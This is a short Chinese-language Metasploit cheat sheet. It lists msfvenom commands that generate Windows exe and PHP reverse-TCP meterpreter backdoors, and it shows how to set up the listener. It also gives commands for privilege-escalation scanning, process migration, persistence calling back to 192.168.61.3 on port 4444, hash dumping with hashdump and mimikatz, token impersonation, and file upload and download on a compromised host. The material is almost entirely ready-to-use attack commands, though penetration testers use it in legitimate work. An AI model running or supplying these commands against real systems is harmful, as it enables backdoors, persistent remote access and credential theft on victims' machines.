Metasploit笔记
生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe
生成PHP后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php
使用监听模块(默认)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
搜寻存在漏洞模块
post/multi/recon/local_exploit_suggester
迁移进程
migrate pid
权限维持 -Persistence
run persistence -U -i 10 -p 4444 -r 192.168.61.3
抓取Hash
run hashdump
load mimikatz
令牌伪装
list_tokens-u
如果查看失败先用
use incognito
或者 load incognito
进入该模块 再使用
impersonate_token 用户名
基本操作命令
ls
:列出当前路径下的所有文件和文件夹。
pwd
或 getwd
:查看当前路径。
search
:搜索文件,使用 search -h
查看帮助。
cat
:查看文件内容,比如 cat test.txt
。
edit
:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。
rm
:删除文件。
cd
:切换路径。
mkdir
:创建文件夹。
rmdir
:删除文件夹。
getlwd
或 lpwd
:查看自己系统的当前路径。
lcd
:切换自己当前系统的目录。
lls
:显示自己当前系统的所有文件和文件夹。
upload
: upload
本地文件路径目标文件路径.
download
: download
目标文件路径 本地文件路径